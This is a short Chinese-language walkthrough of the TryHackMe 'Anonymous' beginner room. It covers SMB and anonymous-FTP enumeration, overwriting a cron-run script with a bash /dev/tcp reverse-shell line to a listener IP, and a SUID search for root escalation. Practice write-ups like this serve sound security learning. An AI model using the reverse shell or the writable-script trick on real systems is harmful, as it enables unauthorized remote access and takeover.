简介：

尝试获得这两个标志！扎根机器并证明您对基本原理的理解！这是一个适合初学者的虚拟机。获取这两个标志需要一些 Linux 和特权升级方法的基本知识。

房间链接：

https://tryhackme.com/room/anonymous

问题：

挑战开始：

首先扫描端口
发现开启了4个端口

首先看下smb

smbclient -L 10.10.243.225

发现有一个共享文件夹，链接下载本地，发现只是普通的图片，并没有什么信息

接着查看21端口的ftp,第一次连接随便输入了个用户名，提示只能匿名登陆，于是第二次连接成功链接，发现有一个文件夹

进入文件夹把文件夹里面的文件下载下来，发现是一个脚本和一个日志文件还有一个txt

并且在不停的定时执行
这里我们在脚本里面加入反弹shell的命令

/bin/bash -i > /dev/tcp/10.10.170.192/8888 0<&1 2>&1

再将本地的脚本上传覆盖上去

本地打开监听，过了一会成功收到shell，找到flag

接着尝试suid提权
发现一个有趣的程序存在suid

find / -user root -perm -4000 -exec ls -ldb {} \;

直接根据方法利用

成功提权，获取root flag

答案